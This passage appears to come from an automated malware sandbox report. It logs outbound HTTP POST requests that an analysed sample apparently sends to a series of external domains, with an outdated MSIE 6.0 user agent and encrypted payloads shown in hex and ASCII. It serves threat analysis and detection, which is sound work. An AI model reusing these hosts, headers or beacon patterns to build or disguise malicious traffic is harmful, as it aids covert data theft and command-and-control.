0mkc1zfypJsUiZ4xpiqwg4DRRzvtfvOEW4H1FNKN6D1tpBoPWs/dTL9bi1GcmiMv0z68Jt6F4Tg+j/WRP1TLrELSMWpPCmRUiewqD0Ea9sTsNy6JXlx77GHCR6gcmV8zj6IDVzJHNePP8BA/tndjM0fzvhYE8AyhPNxebd/BT00sKKmcFEbeXcN4ulCl47SlEnUxEOA8ndew9JhmDDMvYo29y4NWzNIG6gddLcVzkADF0Vlrf8JogFuzKW+f7u0KVd/9yI0/fPWm6xJ1wZ7Puz1xTnj6Dk0neOEUaf4vuSFICTNol62W899+9R5BY34NGg8+Vx57xi1uDcFOdst7GMYAQhohgVBo7YQicCSn1TL2M7AhFY+2J0VhHk4WDT0ScoPkSgBqHzeIrFoj2coWYhClTVUUJq3GZuCmVAYSu0unYUl4r+oa9a+uPKbbnI4dpVq9biFSBaYi9QHxgf3aPuu97iFtT66d+SCbqz+xGEZJEmQruHT32zx32i6Cgy/nnCCZGotmrrULiS8m24kumRxd5Pm9
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.iamdirt.comCache-Control: no-cacheData Raw: 42 46 6d 79 38 69 7a 4a 4c 47 4f 49 34 2f 56 44 46 37 49 6f 77 7a 2f 46 7a 4d 32 45 72 55 57 38 49 46 32 70 34 75 43 4b 69 76 4b 6e 6c 55 48 34 68 76 46 6e 78 35 6e 7a 45 38 68 4d 78 36 2b 45 46 59 62 63 5a 4b 32 67 74 4a 30 51 54 42 58 46 52 4c 6f 75 74 53 6b 34 72 79 4c 68 4b 69 33 48 59 4d 4e 70 69 54 76 4e 54 55 73 54 46 62 4f 4a 55 5a 55 52 33 42 50 6d 4e 44 57 66 61 30 62 44 4b 39 6f 58 5a 69 65 66 43 76 35 56 54 65 67 4f 50 4c 43 2f 2b 6f 6c 70 36 54 41 4e 30 71 59 48 39 78 4e 38 4c 68 38 63 77 6f 72 6b 4a 6d 65 59 5a 71 37 32 58 49 68 38 79 45 55 6c 48 45 70 35 2f 73 6e 51 76 66 6f 47 50 6a 33 39 69 6f 71 78 2b 6f 70 63 7a 6e 74 41 6a 63 78 61 7a 4d 70 61 44 6c 37 70 62 79 67 51 4c 61 4e 6a 59 4e 61 2b 42 5a 4c 43 62 52 65 67 64 38 6d 34 56 2f 54 36 7a 73 47 7a 46 4a 55 48 6a 57 6b 6e 57 64 68 39 6b 79 6e 44 58 36 6e 64 71 7a 38 30 45 6b 34 49 6e 52 54 47 46 77 49 53 70 74 77 6e 46 49 55 78 39 43 6c 70 39 4a 44 49 43 55 47 6d 42 49 53 50 4e 6e 44 4b 4c 54 67 63 58 42 67 63 37 35 41 6f 70 51 47 33 57 50 59 64 4f 45 4c 34 4a 47 78 74 56 41 56 4d 78 72 4b 4e 31 6a 7a 76 4b 75 36 64 6c 45 47 6f 2b 58 2b 36 69 32 4b 36 42 78 43 49 62 31 64 4e 4f 58 55 58 33 71 70 45 67 4b 34 5a 42 54 67 54 56 52 43 4d 55 69 72 45 54 75 6a 2f 4d 37 46 45 52 33 70 32 62 68 6d 38 56 2b 64 30 6f 74 4b 74 38 4a 53 56 48 47 52 75 68 6d 6e 33 4a 6b 43 35 75 52 64 42 58 74 6b 77 2f 32 53 70 4a 68 51 42 50 34 30 34 37 51 45 6e 58 72 75 71 41 39 67 6a 6c 54 6b 49 49 62 35 50 33 50 68 51 7a 36 77 4f 70 6a 31 62 45 43 35 4c 58 34 4e 61 4f 2f 68 38 6c 78 41 72 57 2f 4e 79 34 47 66 30 79 45 47 73 54 71 30 66 6e 75 77 3d Data Ascii: BFmy8izJLGOI4/VDF7Iowz/FzM2ErUW8IF2p4uCKivKnlUH4hvFnx5nzE8hMx6+EFYbcZK2gtJ0QTBXFRLoutSk4ryLhKi3HYMNpiTvNTUsTFbOJUZUR3BPmNDWfa0bDK9oXZiefCv5VTegOPLC/+olp6TAN0qYH9xN8Lh8cworkJmeYZq72XIh8yEUlHEp5/snQvfoGPj39ioqx+opczntAjcxazMpaDl7pbygQLaNjYNa+BZLCbRegd8m4V/T6zsGzFJUHjWknWdh9kynDX6ndqz80Ek4InRTGFwISptwnFIUx9Clp9JDICUGmBISPNnDKLTgcXBgc75AopQG3WPYdOEL4JGxtVAVMxrKN1jzvKu6dlEGo+X+6i2K6BxCIb1dNOXUX3qpEgK4ZBTgTVRCMUirETuj/M7FER3p2bhm8V+d0otKt8JSVHGRuhmn3JkC5uRdBXtkw/2SpJhQBP4047QEnXruqA9gjlTkIIb5P3PhQz6wOpj1bEC5LX4NaO/h8lxArW/Ny4Gf0yEGsTq0fnuw=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 32 73 34 70 67 2f 45 70 4b 57 4d 2b 79 68 66 6a 45 42 72 46 78 45 70 33 52 31 77 76 6f 68 37 5a 74 53 38 4c 52 67 6e 73 7a 71 5a 71 38 72 70 46 70 7a 52 70 70 6a 30 4d 33 36 78 5a 75 56 50 4f 44 7a 4e 70 34 65 4b 2f 42 4d 37 46 56 35 45 79 6b 76 50 49 37 53 53 43 57 6d 32 43 42 48 4f 6a 69 32 32 63 32 4a 51 77 35 42 74 63 46 67 65 38 42 4d 55 55 4b 62 6d 4c 64 53 70 4b 32 6b 33 4d 2b 41 38 58 33 70 77 6f 72 47 68 50 33 66 75 4b 50 45 64 42 79 69 62 65 4f 2b 74 4e 67 36 67 2b 6d 71 63 39 67 38 78 32 75 6b 72 52 78 4c 36 31 51 4c 69 75 30 4a 6c 39 2f 74 6b 78 48 49 4f 65 5a 75 50 77 77 47 33 61 7a 35 49 50 30 65 59 35 61 48 6f 50 4d 74 65 4a 69 4a 6f 67 75 4c 70 44 79 65 50 4d 79 36 66 63 50 4f 2f 35 76 78 6d 6b 76 55 6a 4a 32 71 70 7a 42 44 74 56 71 53 7a 36 2f 71 58 72 2b 32 34 4a 2f 38 36 73 6e 2f 4a 49 70 6f 78 46 34 4e 53 36 6f 4a 76 51 7a 5a 69 51 76 53 67 76 33 66 36 49 74 79 54 45 64 6c 75 32 48 7a 7a 6e 59 33 72 35 37 67 32 62 58 6a 4c 2f 55 59 4f 68 71 4c 62 7a 6e 56 73 4c 61 53 49 74 59 76 56 39 74 72 42 42 51 2b 43 4d 62 39 79 4d 2f 41 52 63 72 36 76 55 6d 65 37 71 46 34 77 7a 6d 35 44 6b 56 68 67 74 69 75 76 54 6b 4e 6f 48 6d 73 57 58 5a 5a 72 33 38 64 47 33 54 42 49 2b 31 4f 4e 37 48 4b 77 7a 42 32 73 30 78 6a 7a 57 32 69 62 64 38 41 61 66 55 74 64 2f 70 4f 7a 79 70 6e 4a 54 63 7a 68 76 48 48 6a 33 4a 61 63 62 70 4b 53 63 73 77 77 5a 74 50 65 38 74 70 2b 49 75 69 70 55 2f 4d 33 55 62 62 38 66 5a 4c 48 48 48 4a 74 30 5a 4a 6e 6a 39 79 4c 2f 4a 6b 4c 63 2b 72 2b 75 45 44 45 75 36 6c 30 43 42 46 37 74 5a 50 61 2f 4d 5a 4e 34 70 69 59 55 4e 52 5a 42 33 71 48 4d 4b 69 68 30 39 75 39 37 65 51 3d 3d Data Ascii: 2s4pg/EpKWM+yhfjEBrFxEp3R1wvoh7ZtS8LRgnszqZq8rpFpzRppj0M36xZuVPODzNp4eK/BM7FV5EykvPI7SSCWm2CBHOji22c2JQw5BtcFge8BMUUKbmLdSpK2k3M+A8X3pworGhP3fuKPEdByibeO+tNg6g+mqc9g8x2ukrRxL61QLiu0Jl9/tkxHIOeZuPwwG3az5IP0eY5aHoPMteJiJoguLpDyePMy6fcPO/5vxmkvUjJ2qpzBDtVqSz6/qXr+24J/86sn/JIpoxF4NS6oJvQzZiQvSgv3f6ItyTEdlu2HzznY3r57g2bXjL/UYOhqLbznVsLaSItYvV9trBBQ+CMb9yM/ARcr6vUme7qF4wzm5DkVhgtiuvTkNoHmsWXZZr38dG3TBI+1ON7HKwzB2s0xjzW2ibd8AafUtd/pOzypnJTczhvHHj3JacbpKScswwZtPe8tp+IuipU/M3Ubb8fZLHHHJt0ZJnj9yL/JkLc+r+uEDEu6l0CBF7tZPa/MZN4piYUNRZB3qHMKih09u97eQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: _mcnc=1; __goc_session__=cftnkefqbeovadfhcumfjapsdjszgtwkData Raw: 4a 55 6f 39 52 6e 2f 75 42 57 4f 31 79 4f 65 79 58 71 6b 70 36 77 67 39 75 46 7a 56 31 4d 69 43 49 36 61 52 54 42 52 2b 2b 4f 74 7a 4b 30 65 48 49 7a 2b 35 51 7a 47 72 68 74 37 52 6e 67 50 53 36 62 64 68 4f 37 61 73 31 6b 51 55 5a 33 61 53 69 63 65 70 61 31 76 71 33 56 49 53 54 77 34 4d 6a 6e 52 5a 54 48 69 70 31 58 4b 39 30 49 4c 2b 46 48 55 72 4a 56 64 6e 2f 4b 57 4a 32 35 65 51 42 57 68 4a 38 5a 6a 61 55 64 32 66 47 6c 38 75 44 47 64 52 69 4d 71 61 77 63 47 78 7a 6e 62 37 43 79 6d 31 43 62 2b 4e 6c 37 66 73 4c 48 6e 4a 56 77 61 45 5a 34 79 56 65 6e 78 44 31 33 58 5a 56 67 39 42 4a 63 77 45 79 70 54 4a 6b 2b 6b 61 75 76 52 41 34 33 74 37 66 55 43 48 6f 71 54 33 57 38 61 73 38 4b 37 38 42 37 6a 6a 42 2f 30 45 33 47 75 66 45 61 44 58 7a 65 34 54 5a 4a 47 33 70 72 36 70 59 66 7a 48 71 58 41 63 78 56 78 4b 50 65 62 67 4a 55 61 36 67 52 47 48 5a 51 4c 64 59 30 34 43 6f 35 32 73 6e 45 39 52 30 51 6e 64 63 37 75 39 5a 57 68 34 62 74 54 7a 6c 52 76 33 4d 54 4d 4c 47 39 73 5a 62 79 58 75 4a 4f 79 70 5a 4b 51 4f 72 63 53 72 49 6a 72 74 42 58 47 38 65 4f 37 61 55 46 64 50 45 6d 67 72 61 45 4a 78 35 36 56 63 77 48 31 6f 32 6a 55 76 39 67 2b 38 69 68 49 4e 53 73 71 66 76 6b 53 56 2f 38 6f 2f 6b 56 46 45 4f 34 64 66 44 46 72 6b 59 45 30 6a 42 31 4f 51 49 70 71 6c 65 68 59 61 6d 31 57 64 30 4a 65 4e 65 4a 59 55 6f 69 44 51 71 58 55 7a 6b 51 6f 7a 49 44 38 34 4e 68 79 6e 61 44 4a 38 6f 6d 79 56 46 6b 6f 53 6d 4d 2b 76 2f 50 39 38 32 77 52 39 6b 61 53 55 34 53 69 71 68 41 59 78 34 68 65 55 66 4a 44 66 70 66 72 66 79 30 55 69 6a 6e 58 72 6b 31 6c 50 71 38 32 34 70 32 46 4d 58 6f 7a 35 64 7a 31 59 66 4a 42 65 Data Ascii: JUo9Rn/uBWO1yOeyXqkp6wg9uFzV1MiCI6aRTBR++OtzK0eHIz+5QzGrht7RngPS6bdhO7as1kQUZ3aSicepa1vq3VISTw4MjnRZTHip1XK90IL+FHUrJVdn/KWJ25eQBWhJ8ZjaUd2fGl8uDGdRiMqawcGxznb7Cym1Cb+Nl7fsLHnJVwaEZ4yVenxD13XZVg9BJcwEypTJk+kauvRA43t7fUCHoqT3W8as8K78B7jjB/0E3GufEaDXze4TZJG3pr6pYfzHqXAcxVxKPebgJUa6gRGHZQLdY04Co52snE9R0Qndc7u9ZWh4btTzlRv3MTMLG9sZbyXuJOypZKQOrcSrIjrtBXG8eO7aUFdPEmgraEJx56VcwH1o2jUv9g+8ihINSsqfvkSV/8o/kVFEO4dfDFrkYE0jB1OQIpqlehYam1Wd0JeNeJYUoiDQqXUzkQozID84NhynaDJ8omyVFkoSmM+v/P982wR9kaSU4SiqhAYx4heUfJDfpfrfy0UijnXrk1lPq824p2FMXoz5dz1YfJBe
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 71 6a 52 4a 35 47 46 52 4c 47 4d 55 75 5a 35 52 77 4c 75 55 34 44 71 38 43 44 46 66 64 6d 2f 4a 4a 56 5a 61 74 4e 48 44 74 79 6e 4c 44 42 67 66 34 32 71 78 77 71 61 6a 4d 50 33 71 63 41 71 66 34 56 6e 64 6e 6d 51 70 4e 2b 53 75 44 6f 6c 4c 58 70 57 32 4f 36 2b 70 6b 4b 52 34 31 38 6a 6c 48 49 32 6d 31 79 70 67 75 71 70 39 41 47 58 6c 2b 35 54 63 78 48 2f 37 6c 54 75 2b 32 68 6f 4e 69 67 7a 43 67 6f 61 74 61 71 66 4d 35 64 78 56 32 56 76 45 52 41 62 79 43 65 47 34 6b 48 32 4b 75 35 61 67 30 69 64 30 4a 37 7a 49 47 63 37 6c 75 36 46 77 6a 78 6b 6a 56 4d 51 2f 76 6c 47 33 79 52 30 30 54 62 2f 32 45 47 74 45 46 74 6d 74 4a 69 68 6c 67 63 78 59 43 4a 39 59 37 37 47 56 66 54 50 42 6e 6a 6e 75 58 6b 34 77 6a 33 51 71 55 73 45 57 58 71 58 77 53 35 78 69 6b 5a 41 42 61 4b 35 6b 53 78 30 31 78 59 56 69 53 59 45 6d 31 65 4f 38 58 73 2f 47 5a 52 69 7a 33 47 6d 79 33 63 41 32 71 7a 78 54 54 69 54 75 53 6d 31 67 31 4b 55 53 6c 50 69 69 6f 54 4e 2f 49 50 4b 72 6d 55 6d 50 79 57 69 6e 71 62 35 49 79 5a 78 76 66 5a 71 68 48 76 34 4b 4b 46 48 73 32 51 58 39 4d 54 76 43 48 6c 56 35 51 6e 54 69 4c 38 5a 48 2f 66 4c 68 53 36 71 35 39 69 41 46 45 4a 58 65 4c 70 6a 6d 37 6f 4d 69 4e 49 78 65 6a 44 2f 62 79 74 37 36 58 6a 45 71 41 42 71 6c 66 5a 6b 50 31 61 5a 48 73 70 74 42 67 55 78 4c 63 52 61 48 35 77 69 4d 76 73 50 7a 74 51 41 2f 66 54 46 33 6b 5a 54 45 57 56 73 31 75 43 51 53 35 66 69 32 38 4c 4b 47 4a 59 73 46 71 36 4a 46 39 51 39 4b 31 70 39 30 5a 52 59 64 38 43 39 42 57 2f 54 51 4c 36 2b 59 71 63 39 37 48 6c 37 32 6b 42 43 62 55 76 41 33 66 76 4c 77 66 47 67 6e 45 4f 57 47 69 78 48 62 64 50 53 6e 72 70 72 79 50 42 41 68 4d 6d 4d 74 50 55 4c 52 35 37 77 2b 37 55 75 75 56 36 45 44 53 7a 4b 6a 2f 42 5a 49 67 4d 39 43 Data Ascii: qjRJ5GFRLGMUuZ5RwLuU4Dq8CDFfdm/JJVZatNHDtynLDBgf42qxwqajMP3qcAqf4VndnmQpN+SuDolLXpW2O6+pkKR418jlHI2m1ypguqp9AGXl+5TcxH/7lTu+2hoNigzCgoataqfM5dxV2VvERAbyCeG4kH2Ku5ag0id0J7zIGc7lu6FwjxkjVMQ/vlG3yR00Tb/2EGtEFtmtJihlgcxYCJ9Y77GVfTPBnjnuXk4wj3QqUsEWXqXwS5xikZABaK5kSx01xYViSYEm1eO8Xs/GZRiz3Gmy3cA2qzxTTiTuSm1g1KUSlPiioTN/IPKrmUmPyWinqb5IyZxvfZqhHv4KKFHs2QX9MTvCHlV5QnTiL8ZH/fLhS6q59iAFEJXeLpjm7oMiNIxejD/byt76XjEqABqlfZkP1aZHsptBgUxLcRaH5wiMvsPztQA/fTF3kZTEWVs1uCQS5fi28LKGJYsFq6JF9Q9K1p90ZRYd8C9BW/TQL6+Yqc97Hl72kBCbUvA3fvLwfGgnEOWGixHbdPSnrpryPBAhMmMtPULR57w+7UuuV6EDSzKj/BZIgM9C
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vazir.seCache-Control: no-cacheCookie: snkz=102.129.143.43; btst=89114abc8f12de8cbbbabddf86489f60|102.129.143.43|1685537428|1685537397|11|3|0Data Raw: 75 62 56 74 61 4b 39 4c 4b 47 50 30 32 59 62 53 7a 6f 57 35 74 37 67 42 5a 58 2f 46 73 52 78 52 55 37 37 4f 48 58 4d 4a 43 71 32 2b 68 4b 75 67 55 6e 39 69 67 76 61 2f 69 6d 44 45 36 31 59 2f 73 72 6a 62 48 72 58 46 4c 78 4a 50 65 2b 78 63 47 4a 41 61 65 75 50 61 66 73 54 64 70 6b 56 42 67 37 2b 7a 4f 49 47 58 4c 79 59 62 6e 48 71 41 75 36 33 58 69 53 6c 71 4a 42 49 73 7a 35 4a 44 58 6f 73 49 30 38 30 38 6c 6d 55 75 55 39 77 78 50 50 33 75 56 47 48 5a 54 73 2f 52 57 30 71 48 70 4f 62 77 45 59 64 66 4b 64 72 56 41 39 54 6e 4b 43 66 30 6f 71 52 32 45 62 6b 50 68 67 62 4c 6b 46 7a 79 72 58 33 44 42 71 56 4b 49 2b 65 6f 54 58 6f 6e 5a 78 52 59 53 64 6c 52 76 43 6d 2b 62 4b 36 6f 42 47 5a 4d 70 58 4d 41 62 45 2f 47 66 51 54 47 4a 77 69 38 71 55 63 66 66 48 64 4e 46 48 6e 55 36 56 69 56 50 66 6f 36 6e 32 31 7a 79 59 62 30 68 61 78 39 57 37 4c 59 73 64 78 32 5a 46 75 78 58 76 7a 33 5a 6f 53 68 4b 54 41 77 6f 44 72 44 62 4c 75 66 62 4d 35 6b 6f 6c 7a 41 72 65 54 56 49 61 69 54 4c 69 59 78 79 31 4b 47 4c 75 57 45 31 75 43 51 72 77 57 43 6a 67 6c 58 6d 71 44 37 57 73 66 41 75 36 66 37 53 45 53 59 72 77 66 38 75 52 39 54 49 7a 64 74 47 41 49 52 56 6f 64 52 68 6d 6e 62 36 6d 73 69 7a 54 4e 2f 30 6a 63 51 48 36 68 47 79 64 45 6b 7a 51 37 57 7a 73 51 64 75 4c 72 54 42 5a 50 69 69 76 74 59 35 61 53 59 4f 58 45 37 73 77 68 36 4e 4a 43 52 69 41 71 54 65 51 4b 67 4a 38 4b 45 37 38 58 51 76 77 5a 6c 55 77 70 4d 4c 48 78 67 49 58 48 33 4b 5a 56 67 2b 7a 6a 65 6c 63 49 35 69 75 71 51 71 67 62 57 47 33 50 2f 64 58 62 75 68 79 58 71 70 33 64 54 7a 36 2f 74 52 46 47 6d 47 51 65 77 45 4f 6c 73 75 2f 4f 41 4c 68 67 63 43 75 63 32 58 43 34 68 50 62 36 50 74 37 64 45 46 55 6a 64 5a 31 33 51 62 4c 72 51 4f 76 31 43 64 63 66 45 46 62 75 67 49 46 48 4a 77 32 72 52 39 35 41 61 Data Ascii: ubVtaK9LKGP02YbSzoW5t7gBZX/FsRxRU77OHXMJCq2+hKugUn9igva/imDE61Y/srjbHrXFLxJPe+xcGJAaeuPafsTdpkVBg7+zOIGXLyYbnHqAu63XiSlqJBIsz5JDXosI0808lmUuU9wxPP3uVGHZTs/RW0qHpObwEYdfKdrVA9TnKCf0oqR2EbkPhgbLkFzyrX3DBqVKI+eoTXonZxRYSdlRvCm+bK6oBGZMpXMAbE/GfQTGJwi8qUcffHdNFHnU6ViVPfo6n21zyYb0hax9W7LYsdx2ZFuxXvz3ZoShKTAwoDrDbLufbM5kolzAreTVIaiTLiYxy1KGLuWE1uCQrwWCjglXmqD7WsfAu6f7SESYrwf8uR9TIzdtGAIRVodRhmnb6msizTN/0jcQH6hGydEkzQ7WzsQduLrTBZPiivtY5aSYOXE7swh6NJCRiAqTeQKgJ8KE78XQvwZlUwpMLHxgIXH3KZVg+zjelcI5iuqQqgbWG3P/dXbuhyXqp3dTz6/tRFGmGQewEOlsu/OALhgcCuc2XC4hPb6Pt7dEFUjdZ13QbLrQOv1CdcfEFbugIFHJw2rR95Aa
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 6c 75 53 51 63 65 4c 6e 4d 47 50 50 67 4d 78 43 56 63 56 67 5a 32 56 33 58 6c 31 79 71 63 51 54 4e 6a 79 37 68 74 4a 31 2f 6b 57 57 45 70 6a 42 6b 36 31 45 77 7a 62 47 68 7a 63 65 41 56 50 47 50 71 30 4b 4b 50 72 34 57 65 47 6d 54 2b 30 64 73 52 54 71 72 46 67 47 73 6c 7a 45 63 4f 73 33 4a 46 67 50 37 58 6b 30 4c 65 5a 45 70 7a 69 4f 63 37 6b 38 33 38 39 5a 58 49 4d 4a 50 6b 59 64 6b 73 55 44 31 43 68 58 6f 2b 51 5a 41 66 62 39 4e 71 4b 33 4f 71 50 6e 42 76 46 57 62 6e 6f 4e 61 43 2b 71 4a 68 6f 78 45 47 6e 31 53 55 68 47 48 6c 54 37 4c 75 58 32 73 71 6a 55 67 70 74 37 4a 6d 6b 69 66 6e 4a 47 45 5a 6c 67 5a 44 65 4f 38 37 4b 65 34 39 32 4a 48 69 4e 46 46 36 79 70 39 57 5a 79 5a 34 69 41 34 61 44 35 47 69 38 30 6c 32 2f 6f 39 42 35 43 54 43 4a 5a 67 65 75 70 4a 35 32 44 52 72 72 49 4a 57 65 35 6d 45 50 46 56 50 30 58 4f 77 57 39 63 7a 74 79 2b 35 50 44 74 5a 56 5a 43 36 30 67 52 5a 50 2b 65 54 66 6b 4b 6d 48 41 42 41 6c 4f 58 62 66 49 32 53 2f 7a 45 52 79 76 65 32 75 42 57 78 6f 35 58 30 38 38 57 75 52 4f 34 36 65 49 36 6d 61 34 51 72 79 30 4e 57 59 37 39 30 78 54 53 2b 6d 54 50 74 54 42 4c 71 58 75 37 46 53 54 65 73 58 63 63 62 76 78 6e 5a 4f 6a 62 38 4d 62 56 38 32 2f 58 38 33 65 75 69 75 74 59 51 6f 50 52 62 2b 74 76 66 6d 6f 30 6f 34 76 6b 5a 4a 50 47 43 75 30 79 57 66 72 32 59 71 4c 75 67 64 4a 42 45 59 48 43 46 61 4f 41 4f 55 62 76 36 37 77 77 32 4d 68 66 38 41 33 4c 37 50 31 70 79 7a 54 77 63 39 72 70 48 71 37 69 4d 4b 62 52 56 4d 73 4a 7a 62 6b 45 49 48 44 30 71 43 7a 45 6e 76 36 78 51 39 54 63 63 46 6f 37 43 6a 50 2b 48 53 39 55 34 35 44 52 74 74 73 65 55 32 58 4d 70 66 70 65 76 72 51 38 4e 6e 48 65 62 50 63 6e 36 47 6e 75 76 41 2f 54 55 71 53 6f 31 6d 53 59 4b 61 4d 79 4a 52 58 Data Ascii: luSQceLnMGPPgMxCVcVgZ2V3Xl1yqcQTNjy7htJ1/kWWEpjBk61EwzbGhzceAVPGPq0KKPr4WeGmT+0dsRTqrFgGslzEcOs3JFgP7Xk0LeZEpziOc7k8389ZXIMJPkYdksUD1ChXo+QZAfb9NqK3OqPnBvFWbnoNaC+qJhoxEGn1SUhGHlT7LuX2sqjUgpt7JmkifnJGEZlgZDeO87Ke492JHiNFF6yp9WZyZ4iA4aD5Gi80l2/o9B5CTCJZgeupJ52DRrrIJWe5mEPFVP0XOwW9czty+5PDtZVZC60gRZP+eTfkKmHABAlOXbfI2S/zERyve2uBWxo5X088WuRO46eI6ma4Qry0NWY790xTS+mTPtTBLqXu7FSTesXccbvxnZOjb8MbV82/X83euiutYQoPRb+tvfmo0o4vkZJPGCu0yWfr2YqLugdJBEYHCFaOAOUbv67ww2Mhf8A3L7P1pyzTwc9rpHq7iMKbRVMsJzbkEIHD0qCzEnv6xQ9TccFo7CjP+HS9U45DRttseU2XMpfpevrQ8NnHebPcn6GnuvA/TUqSo1mSYKaMyJRX
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abart.plCache-Control: no-cacheData Raw: 30 73 43 59 51 52 64 5a 4c 32 50 32 68 37 44 63 42 71 4f 55 31 6d 41 2f 6e 6c 4e 4e 33 32 57 47 4f 79 34 4e 66 5a 67 6b 6f 58 72 6e 58 41 66 71 42 38 63 44 51 4a 56 57 41 34 66 72 63 57 5a 44 55 75 74 55 5a 66 53 75 52 49 43 78 44 71 36 52 6e 4d 2f 38 4e 62 66 43 38 58 57 4f 45 75 35 72 6c 53 4e 50 6e 34 38 4f 4e 70 4c 4f 68 2b 34 46 77 43 4c 7a 58 78 62 2f 7a 55 4f 55 6d 53 42 64 36 42 31 4a 72 4f 35 67 68 35 4f 57 30 33 4e 36 46 59 50 2b 76 77 73 38 30 52 51 6d 57 61 42 34 6c 59 68 4b 6b 65 65 6c 49 6b 68 6e 58 76 31 30 4f 4a 61 4c 74 66 57 74 65 46 71 6d 39 65 63 6a 38 77 7a 78 63 63 69 30 31 70 46 4a 4e 4e 49 55 74 59 52 73 67 50 32 58 77 68 2f 56 39 69 43 36 64 52 4a 30 75 33 6c 62 2f 71 67 50 31 49 56 68 44 6c 48 45 57 51 41 71 50 70 41 77 65 30 31 6a 41 4d 57 79 32 34 55 7a 79 55 38 38 54 53 48 58 48 7a 7a 5a 61 63 4e 4f 6b 74 4c 41 63 67 6a 4c 71 67 56 6a 38 2b 45 78 45 63 47 42 77 33 48 30 56 4b 4f 69 35 50 75 43 31 53 57 6a 62 6f 59 6f 6c 4b 4c 6e 58 71 73 63 66 48 66 36 64 59 74 77 39 38 77 76 63 75 65 64 36 70 45 73 76 62 45 67 33 4c 48 33 69 58 54 7a 77 61 45 59 4f 70 6d 57 34 57 52 6f 4b 75 2f 6f 50 44 77 54 4b 55 69 53 6b 67 33 4d 6a 74 73 46 37 2b 33 4c 73 6c 46 2f 6e 33 66 34 6d 62 55 4b 52 67 31 4d 4d 58 67 6a 69 53 34 30 2b 74 50 6b 43 63 6e 42 57 50 42 43 31 47 46 6b 7a 43 6a 55 6f 4a 33 56 62 51 35 34 6e 6b 71 2f 43 63 78 6c 31 75 4c 6f 72 30 58 71 4e 44 37 67 53 77 41 41 42 52 62 30 32 30 36 6e 6a 56 66 61 45 77 31 4f 4b 6b 65 6a 30 30 6d 39 2b 72 52 4b 7a 70 58 59 43 35 65 73 6a 34 41 2f 6f 70 53 7a 7a 6b 34 37 31 6a 76 4f 61 35 68 6b 75 56 5a 57 56 71 63 71 79 67 73 56 75 51 4c 57 Data Ascii: 0sCYQRdZL2P2h7DcBqOU1mA/nlNN32WGOy4NfZgkoXrnXAfqB8cDQJVWA4frcWZDUutUZfSuRICxDq6RnM/8NbfC8XWOEu5rlSNPn48ONpLOh+4FwCLzXxb/zUOUmSBd6B1JrO5gh5OW03N6FYP+vws80RQmWaB4lYhKkeelIkhnXv10OJaLtfWteFqm9ecj8wzxcci01pFJNNIUtYRsgP2Xwh/V9iC6dRJ0u3lb/qgP1IVhDlHEWQAqPpAwe01jAMWy24UzyU88TSHXHzzZacNOktLAcgjLqgVj8+ExEcGBw3H0VKOi5PuC1SWjboYolKLnXqscfHf6dYtw98wvcued6pEsvbEg3LH3iXTzwaEYOpmW4WRoKu/oPDwTKUiSkg3MjtsF7+3LslF/n3f4mbUKRg1MMXgjiS40+tPkCcnBWPBC1GFkzCjUoJ3VbQ54nkq/Ccxl1uLor0XqND7gSwAABRb0206njVfaEw1OKkej00m9+rRKzpXYC5esj4A/opSzzk471jvOa5hkuVZWVqcqygsVuQLW
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 62 63 75 5a 58 79 4f 78 73 5a 76 55 75 32 68 56 71 75 52 7a 50 55 79 76 37 73 39 4a 42 68 2f 52 42 35 6b 41 4a 73 67 47 32 61 50 4c 41 43 79 77 52 75 62 6c 54 6c 51 48 5a 7a 33 50 7a 74 53 58 52 6a 50 4c 73 2b 62 34 75 51 6a 6f 31 2b 74 78 51 6a 43 7a 6e 62 41 47 53 34 4c 55 63 59 72 6a 58 77 33 4f 77 33 50 2b 6d 6a 74 73 77 76 53 48 4f 4c 78 6b 4c 6a 52 49 34 67 49 2b 31 31 51 58 66 36 54 65 2f 79 4f 45 6f 56 43 6f 6f 4f 42 33 56 6c 77 69 79 34 6a 39 46 77 47 69 47 4b 58 55 64 34 74 55 75 33 4d 48 42 77 43 34 30 44 43 56 52 43 35 51 63 43 5a 43 50 67 5a 33 78 6e 43 64 72 74 6d 4c 37 35 6e 72 6f 63 77 2f 37 61 49 70 42 65 7a 79 30 51 52 53 61 76 65 56 4c 5a 4b 41 75 48 4e 67 34 76 6a 6f 4b 34 30 6d 53 72 69 2b 75 49 64 76 4c 2b 4a 6c 54 2f 2f 6c 62 73 41 43 78 2b 50 38 6c 4c 37 4f 39 41 34 51 4c 6d 6e 7a 58 78 4a 37 31 33 4d 72 71 76 7a 50 6d 79 63 61 4b 36 57 72 54 4a 59 30 39 74 34 32 2f 44 6f 2f 62 42 61 46 69 67 47 79 49 31 71 58 